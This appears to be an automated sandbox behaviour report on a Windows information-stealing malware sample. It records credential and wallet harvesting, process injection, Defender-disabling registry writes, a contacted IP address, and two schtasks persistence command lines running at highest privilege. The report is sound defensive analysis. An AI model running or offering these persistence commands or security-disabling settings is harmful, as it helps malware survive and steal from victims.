RegQueryValueExA Jan. 26, 2024, 9:01 a.m.	key_handle: 0x00000470 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OSM UX MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Jan. 26, 2024, 9:01 a.m.	key_handle: 0x00000470 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared Setup Metadata MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Jan. 26, 2024, 9:01 a.m.	key_handle: 0x00000470 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Access Setup Metadata MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Jan. 26, 2024, 9:01 a.m.	key_handle: 0x00000470 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Lync MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Jan. 26, 2024, 9:01 a.m.	key_handle: 0x00000470 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Professional Plus 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Jan. 26, 2024, 9:01 a.m.	key_handle: 0x00000470 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 ActiveX regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName	1
RegQueryValueExA Jan. 26, 2024, 9:01 a.m.	key_handle: 0x00000470 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 NPAPI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName	1
RegQueryValueExA Jan. 26, 2024, 9:01 a.m.	key_handle: 0x00000470 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Acrobat Reader DC MUI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\DisplayName	1
RegQueryValueExA Jan. 26, 2024, 9:01 a.m.	key_handle: 0x00000470 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName	1
RegQueryValueExW Jan. 26, 2024, 9:02 a.m.	key_handle: 0x00000548 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 7-Zip 20.02 alpha regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName	1
RegQueryValueExW Jan. 26, 2024, 9:02 a.m.	key_handle: 0x00000548 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName	1
RegQueryValueExW Jan. 26, 2024, 9:02 a.m.	key_handle: 0x00000548 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExW Jan. 26, 2024, 9:02 a.m.	key_handle: 0x00000548 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExW Jan. 26, 2024, 9:02 a.m.	key_handle: 0x00000548 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExW Jan. 26, 2024, 9:02 a.m.	key_handle: 0x00000548 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Mozilla Thunderbird 78.4.0 (x86 ko) regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName	1
RegQueryValueExW Jan. 26, 2024, 9:02 a.m.	key_handle: 0x00000548 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Professional Plus 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR\DisplayName	1
RegQueryValueExW Jan. 26, 2024, 9:02 a.m.	key_handle: 0x00000548 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName	1
RegQueryValueExW Jan. 26, 2024, 9:02 a.m.	key_handle: 0x00000548 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExW Jan. 26, 2024, 9:02 a.m.	key_handle: 0x00000548 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExW Jan. 26, 2024, 9:02 a.m.	key_handle: 0x00000548 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java 8 Update 131 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}\DisplayName	1
RegQueryValueExW Jan. 26, 2024, 9:02 a.m.	key_handle: 0x00000548 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java Auto Updater regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\DisplayName	1

Harvests credentials from local email clients (5 events)

file	C:\Users\test22\AppData\Roaming\ICQ\0001
file	C:\Users\test22\AppData\Roaming\Thunderbird\profiles.ini
registry	HKEY_CURRENT_USER\Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
registry	HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
registry	HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Attempts to create or modify system certificates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob

Network activity contains more than one unique useragent (4 events)

process	rost.exe	useragent	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36
process	iexplore.exe	useragent	Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
process	explorhe.exe	useragent
process	InstallSetup7.exe	useragent	NSIS_Inetc (Mozilla)

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 3532 called NtSetContextThread to modify thread in remote process 2620
NtSetContextThread Jan. 26, 2024, 9:02 a.m.	registers.eip: 2005598660 registers.esp: 3538788 registers.edi: 0 registers.eax: 4391566 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000224 process_identifier: 2620	1	0	0

Creates a slightly modified copy of itself (1 event)

description

Possibly a polymorphic version of itself

file

{u'size': 1206784, u'yara': [{u'strings': [], u'meta': {u'description': u'(no description)'}, u'name': u'IsPE32', u'offsets': {}}, {u'strings': [u'bnRkbGwuZGw='], u'meta': {u'date': u'2021-03-16', u'update': u'2021-04-14', u'description': u'Malicious Packer', u'author': u'r0d'}, u'name': u'Malicious_Packer_Zero', u'offsets': {u'o104': [[562778L, 0]]}}, {u'strings': [u'TVo='], u'meta': {u'ini_date': u'2020-06-03', u'description': u'PE File Signature', u'author': u'r0d'}, u'name': u'PE_Header_Zero', u'offsets': {u'signature': [[0L, 0]]}}], u'sha1': u'5a73502a3a1d1e2e338f460759d384de372bb8ee', u'name': u'38ab80de75a319f2_stan.exe', u'filepath': u'C:\\Users\\test22\\AppData\\Local\\Temp\\1000609001\\stan.exe', u'sha512': u'312285002178997a94dcb45c75a5fe07b97497b40fb52cdeb937a43f8778cd6397b8426959250df21fb6b8f128a218f384531bc11d30976c953caf134657005e', u'urls': [], u'crc32': u'34B5F5B9', u'path': u'/home/cuckoo/.cuckoo/storage/analyses/47646/files/38ab80de75a319f2_stan.exe', u'ssdeep': u'24576:MHZ/m0WaVIiMgrVVTwW8O/PUdlwQqN2K3yWds0JkKyVSupaxxHPTOC:MHJCBUTwa/PolnadsLEuY/va', u'sha256': u'38ab80de75a319f2f1d2096d4dc661e599aa1439c6a2e1d4781097b3b2f6edab', u'type': u'PE32 executable (GUI) Intel 80386, for MS Windows', u'pids': [316, 3380], u'md5': u'b6342a379e219478de2da371d804131e', u'virustotal': {u'summary': {u'error': u'resource has not been scanned yet'}}}

Drops 157 unknown file mime types indicative of ransomware writing encrypted files back to disk (50 out of 157 events)

file	C:\Windows\Prefetch\PYTHON.EXE-C663CFDC.pf
file	C:\Windows\Prefetch\GOOGLEUPDATESETUP.EXE-305B5E54.pf
file	C:\Windows\Prefetch\AUDIODG.EXE-BDFD3029.pf
file	C:\Windows\Prefetch\THUNDERBIRD.EXE-A0DA674F.pf
file	C:\Windows\Prefetch\DLLHOST.EXE-4F28A26F.pf
file	c:\Windows\Temp\fwtsqmfile01.sqm
file	C:\Windows\Prefetch\SVCHOST.EXE-7AC6742A.pf
file	C:\Windows\Prefetch\MOBSYNC.EXE-C5E2284F.pf
file	C:\Windows\Prefetch\PW.EXE-1D40DDAD.pf
file	C:\Windows\Prefetch\GOOGLEUPDATE.EXE-D0E66F4A.pf
file	C:\Windows\Prefetch\86.0.4240.111_CHROME_INSTALLE-AF26656A.pf
file	C:\Windows\Prefetch\CSC.EXE-BE9AC2DF.pf
file	c:\Windows\Temp\fwtsqmfile00.sqm
file	C:\Windows\Prefetch\WMIPRVSE.EXE-1628051C.pf
file	C:\Windows\Prefetch\SOFTWARE_REPORTER_TOOL.EXE-EB18F4FF.pf
file	C:\Windows\Prefetch\RUNDLL32.EXE-DE9673F9.pf
file	C:\Users\test22\AppData\Local\Temp\~DF8C0F100C7231519A.TMP
file	C:\Windows\Prefetch\IEXPLORE.EXE-908C99F8.pf
file	C:\Windows\Prefetch\CMD.EXE-4A81B364.pf
file	C:\Windows\Prefetch\DLLHOST.EXE-5E46FA0D.pf
file	C:\Windows\Prefetch\SLUI.EXE-724E99D9.pf
file	C:\Windows\Prefetch\RUNDLL32.EXE-1304AE86.pf
file	C:\Windows\Prefetch\PING.EXE-7E94E73E.pf
file	C:\Windows\Prefetch\CONHOST.EXE-1F3E9D7E.pf
file	C:\Windows\Prefetch\GOOGLEUPDATE.EXE-C3A1B497.pf
file	C:\Windows\Prefetch\IEXPLORE.EXE-4B6C9213.pf
file	C:\Windows\Prefetch\DEFRAG.EXE-588F90AD.pf
file	C:\Windows\Prefetch\CHROME.EXE-D999B1BA.pf
file	C:\Windows\Prefetch\IMKRMIG.EXE-AAA206C5.pf
file	C:\Windows\Prefetch\UNPACK200.EXE-E4DF1A4E.pf
file	C:\Windows\Prefetch\DLLHOST.EXE-40DD444D.pf
file	C:\Windows\Prefetch\7ZFM.EXE-22E64FB8.pf
file	C:\Windows\Prefetch\GOOGLEUPDATESETUP.EXE-B0D5C571.pf
file	C:\Windows\Prefetch\GOOGLEUPDATESETUP.EXE-34B7EAE8.pf
file	C:\Windows\Prefetch\SVCHOST.EXE-E1E0ACE0.pf
file	C:\Windows\Prefetch\LOGONUI.EXE-09140401.pf
file	C:\Windows\Prefetch\AgGlFgAppHistory.db
file	C:\Windows\Prefetch\JAVAW.EXE-D0AA8787.pf
file	C:\Windows\Prefetch\SSVAGENT.EXE-0CD059B7.pf
file	C:\Windows\Prefetch\TRUSTEDINSTALLER.EXE-3CC531E5.pf
file	C:\Windows\Prefetch\AgGlUAD_P_S-1-5-21-3832866432-4053218753-3017428901-1001.db
file	C:\Windows\Prefetch\OSE.EXE-2B23CA4C.pf
file	C:\Windows\Prefetch\INSTALLER.EXE-60163557.pf
file	C:\Windows\Prefetch\PINGSENDER.EXE-8E79128B.pf
file	C:\Windows\Prefetch\RUNDLL32.EXE-5A853E81.pf
file	C:\Windows\Prefetch\AgRobust.db
file	C:\Windows\Prefetch\ICACLS.EXE-B19DE1F7.pf
file	C:\Windows\Prefetch\IMEKLMG.EXE-3FEB7CC0.pf
file	C:\Windows\Prefetch\GOOGLEUPDATECOMREGISTERSHELL6-BB6760AF.pf
file	C:\Windows\Prefetch\NOTEPAD.EXE-D8414F97.pf

Appends a known CryptoMix ransomware file extension to files that have been encrypted (2 events)

file	C:\Users\test22\AppData\Roaming\Exodus\exodus.wallet
file	C:\Users\test22\AppData\Roaming\MultiDoge\multidoge.wallet

Deletes a large number of files from the system indicative of ransomware, wiper malware or system destruction (50 out of 501 events)

file	C:\Users\test22\AppData\Local\Temp\nskD5C4.tmp
file	C:\Users\test22\AppData\Local\Temp\nshDAD7.tmp
file	C:\Users\test22\AppData\Local\Temp\nsaD6BF.tmp
file	C:\Users\test22\AppData\Local\Temp\nsaD6BF.tmp\INetC.dll
file	C:\Users\test22\AppData\Local\Temp\jobA4M1jhwiskHEa_E\QdX9ITDLyCRBplaces.sqlite
file	C:\Users\test22\AppData\Local\Temp\jobA4M1jhwiskHEa_E\02zdBXl47cvzHistory
file	C:\Users\test22\AppData\Local\Temp\jobA4M1jhwiskHEa_E\D87fZN3R3jFeplaces.sqlite
file	C:\Users\test22\AppData\Local\Temp\jobA4M1jhwiskHEa_E\3b6N2Xdh3CYwplaces.sqlite
file	C:\Users\test22\AppData\Local\Temp\jobA4M1jhwiskHEa_E\02zdBXl47cvzcookies.sqlite
file	C:\Users\test22\AppData\Local\Temp\jobA4M1jhwiskHEa_E\Ei8DrAmaYu9KLogin Data
file	C:\Users\test22\AppData\Local\Temp\jobA4M1jhwiskHEa_E\KvHrxJ77cmUgcookies.sqlite
file	C:\Users\test22\AppData\Local\Temp\jobA4M1jhwiskHEa_E\IWPfiAXUTJTSformhistory.sqlite
file	C:\Users\test22\AppData\Local\Temp\jobA4M1jhwiskHEa_E\IWPfiAXUTJTSHistory
file	C:\Users\test22\AppData\Local\Temp\jobA4M1jhwiskHEa_E\JX0OQi4nZtiqplaces.sqlite
file	C:\Users\test22\AppData\Local\Temp\jobA4M1jhwiskHEa_E\3b6N2Xdh3CYwWeb Data
file	C:\Users\test22\AppData\Local\Temp\jobA4M1jhwiskHEa_E\QdX9ITDLyCRBWeb Data
file	C:\Users\test22\AppData\Local\Temp\jobA4M1jhwiskHEa_E\D87fZN3R3jFeWeb Data
file	C:\Users\test22\AppData\Local\Temp\VYu9OHsHVclRag1IFsByIkk8JD8NBWZW.zip
file	C:\Users\test22\AppData\Local\Temp\jobA4M1jhwiskHEa_E\5lop_S5WM5ERCookies
file	C:\Users\test22\AppData\Local\Temp\SetupExe(20200504224110B04).log
file	C:\Windows\Prefetch\SNIPPINGTOOL.EXE-EFFDAFDE.pf
file	C:\Windows\Prefetch\IMEKLMG.EXE-3FEB7CC0.pf
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\1F4WQUHZ\dropbox_logo_text_2015-vfld7_dJ8[1].svg
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\niks[1].exe
file	C:\Users\test22\AppData\Local\Temp\jobA4M1jhwiskHEa_E\Q2lP3WOPFRddpU6U21z0.exe
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\override[1].css
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\networa[1].exe
file	C:\Windows\Prefetch\SVCHOST.EXE-80F4A784.pf
file	C:\Windows\Prefetch\AUTORUN.EXE-EC0E27A9.pf
file	C:\Users\test22\AppData\Local\Temp\dd_vcredist_amd64_20180201144548_000_vcRuntimeMinimum_x64.log
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BYECVYBT\fsdfsfsfs[1].exe
file	C:\Users\test22\AppData\Local\Temp\{E7573238-1B24-467B-B5A4-0BE967E0BF64}.tmp
file	C:\Windows\Prefetch\CONTROL.EXE-817F8F1D.pf
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\U06NAGU2\mnrstrtr[1].js
file	C:\Windows\Prefetch\MSCORSVW.EXE-90526FAC.pf
file	C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000026.log
file	C:\Windows\Prefetch\RUNDLL32.EXE-5A853E81.pf
file	C:\Windows\Prefetch\CVTRES.EXE-2B9D810D.pf
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\SOC-Facebook[1].png
file	C:\Windows\Prefetch\RUNDLL32.EXE-8C11D845.pf
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\f[2].txt
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\keys_js5[2].htm
file	C:\Windows\Prefetch\WERMGR.EXE-0F2AC88C.pf
file	C:\Windows\Prefetch\SVCHOST.EXE-E1E0ACE0.pf
file	C:\Windows\Prefetch\RUNDLL32.EXE-4366A668.pf
file	C:\Windows\Prefetch\RUNDLL32.EXE-87432CEE.pf
file	C:\Windows\Prefetch\AgGlUAD_P_S-1-5-21-3832866432-4053218753-3017428901-1001.db
file	C:\Windows\Prefetch\AgAppLaunch.db
file	C:\Users\test22\AppData\Local\Temp\SetupExe(20180405152131B24).log
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BYECVYBT\syncUpd[1].exe

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2760 resumed a thread in remote process 2840
Process injection	Process 3532 resumed a thread in remote process 2620
NtResumeThread Jan. 26, 2024, 9:01 a.m.	thread_handle: 0x00000338 suspend_count: 1 process_identifier: 2840	1	0	0
NtResumeThread Jan. 26, 2024, 9:02 a.m.	thread_handle: 0x00000224 suspend_count: 1 process_identifier: 2620	1	0	0

Uses Sysinternals tools in order to add additional command line functionality (2 events)

cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST

Detects VirtualBox through the presence of a file (1 event)

file	C:\Windows\Prefetch\VBOXDRVINST.EXE-7DCD6070.pf

Connects to an IP address that is no longer responding to requests (legitimate services will remain up-and-running usually) (1 event)

dead_host

5.42.64.33:80

Disables Windows Security features (6 events)

description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection

Executed a process and injected code into it, probably while unpacking (50 out of 154 events)

Time & API	Arguments	Status	Return
NtResumeThread Jan. 26, 2024, 9 a.m.	thread_handle: 0x00000134 suspend_count: 1 process_identifier: 1932	1	0
CreateProcessInternalW Jan. 26, 2024, 9:01 a.m.	thread_identifier: 2436 thread_handle: 0x0000013c process_identifier: 2432 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x00000140	1	1
CreateProcessInternalW Jan. 26, 2024, 9:01 a.m.	thread_identifier: 2544 thread_handle: 0x00000148 process_identifier: 2540 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x00000144	1	1
NtResumeThread Jan. 26, 2024, 9:01 a.m.	thread_handle: 0x000001c0 suspend_count: 1 process_identifier: 1932	1	0
CreateProcessInternalW Jan. 26, 2024, 9:01 a.m.	thread_identifier: 2712 thread_handle: 0x0000064c process_identifier: 2708 current_directory: C:\Users\test22\AppData\Local\Temp\jobA4M1jhwiskHEa_E filepath: C:\Users\test22\AppData\Local\Temp\jobA4M1jhwiskHEa_E\KUrJTQEsIHMvAcabBVxa.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\jobA4M1jhwiskHEa_E\KUrJTQEsIHMvAcabBVxa.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\jobA4M1jhwiskHEa_E\KUrJTQEsIHMvAcabBVxa.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000650	1	1
CreateProcessInternalW Jan. 26, 2024, 9:01 a.m.	thread_identifier: 1872 thread_handle: 0x00000650 process_identifier: 804 current_directory: C:\Users\test22\AppData\Local\Temp\jobA4M1jhwiskHEa_E filepath: C:\Users\test22\AppData\Local\Temp\jobA4M1jhwiskHEa_E\EOhQhAkcbWTB_T1v1y_S.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\jobA4M1jhwiskHEa_E\EOhQhAkcbWTB_T1v1y_S.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\jobA4M1jhwiskHEa_E\EOhQhAkcbWTB_T1v1y_S.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000658	1	1
CreateProcessInternalW Jan. 26, 2024, 9:01 a.m.	thread_identifier: 1976 thread_handle: 0x00000654 process_identifier: 2028 current_directory: C:\Users\test22\AppData\Local\Temp\jobA4M1jhwiskHEa_E filepath: C:\Users\test22\AppData\Local\Temp\jobA4M1jhwiskHEa_E\txBA3rlC1VaXg6uHQQD1.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\jobA4M1jhwiskHEa_E\txBA3rlC1VaXg6uHQQD1.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\jobA4M1jhwiskHEa_E\txBA3rlC1VaXg6uHQQD1.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000065c	1	1
CreateProcessInternalW Jan. 26, 2024, 9:01 a.m.	thread_identifier: 2872 thread_handle: 0x00000654 process_identifier: 2868 current_directory: C:\Users\test22\AppData\Local\Temp\jobA4M1jhwiskHEa_E filepath: C:\Users\test22\AppData\Local\Temp\jobA4M1jhwiskHEa_E\Q2lP3WOPFRddpU6U21z0.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\jobA4M1jhwiskHEa_E\Q2lP3WOPFRddpU6U21z0.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\jobA4M1jhwiskHEa_E\Q2lP3WOPFRddpU6U21z0.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000658	1	1
CreateProcessInternalW Jan. 26, 2024, 9:01 a.m.	thread_identifier: 2516 thread_handle: 0x0000065c process_identifier: 2524 current_directory: C:\Users\test22\AppData\Local\Temp\jobA4M1jhwiskHEa_E filepath: C:\Users\test22\AppData\Local\Temp\jobA4M1jhwiskHEa_E\K5hUVnj3aMwtC3i_NpaY.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\jobA4M1jhwiskHEa_E\K5hUVnj3aMwtC3i_NpaY.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\jobA4M1jhwiskHEa_E\K5hUVnj3aMwtC3i_NpaY.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000660	1	1
CreateProcessInternalW Jan. 26, 2024, 9:01 a.m.	thread_identifier: 2764 thread_handle: 0x000001d0 process_identifier: 2760 current_directory: C:\Users\test22\AppData\Local\Temp\jobA4M1jhwiskHEa_E filepath: C:\Program Files (x86)\Internet Explorer\iexplore.exe track: 1 command_line: "C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome filepath_r: C:\Program Files (x86)\Internet Explorer\iexplore.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000001cc	1	1
NtResumeThread Jan. 26, 2024, 9:01 a.m.	thread_handle: 0x00000270 suspend_count: 1 process_identifier: 2708	1	0
NtResumeThread Jan. 26, 2024, 9:01 a.m.	thread_handle: 0x00000218 suspend_count: 1 process_identifier: 2760	1	0
CreateProcessInternalW Jan. 26, 2024, 9:01 a.m.	thread_identifier: 2844 thread_handle: 0x00000338 process_identifier: 2840 current_directory: filepath: track: 1 command_line: "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2760 CREDAT:145409 filepath_r: stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x0000033c	1	1
NtResumeThread Jan. 26, 2024, 9:01 a.m.	thread_handle: 0x00000338 suspend_count: 1 process_identifier: 2840	1	0
NtResumeThread Jan. 26, 2024, 9:01 a.m.	thread_handle: 0x00000410 suspend_count: 1 process_identifier: 2760	1	0
NtResumeThread Jan. 26, 2024, 9:01 a.m.	thread_handle: 0x00000298 suspend_count: 1 process_identifier: 2760	1	0
NtResumeThread Jan. 26, 2024, 9:01 a.m.	thread_handle: 0x000001fc suspend_count: 1 process_identifier: 2840	1	0
NtResumeThread Jan. 26, 2024, 9:01 a.m.	thread_handle: 0x00000230 suspend_count: 1 process_identifier: 2840	1	0
NtResumeThread Jan. 26, 2024, 9:01 a.m.	thread_handle: 0x00000240 suspend_count: 1 process_identifier: 2840	1	0
NtResumeThread Jan. 26, 2024, 9:01 a.m.	thread_handle: 0x0000067c suspend_count: 1 process_identifier: 2840	1	0
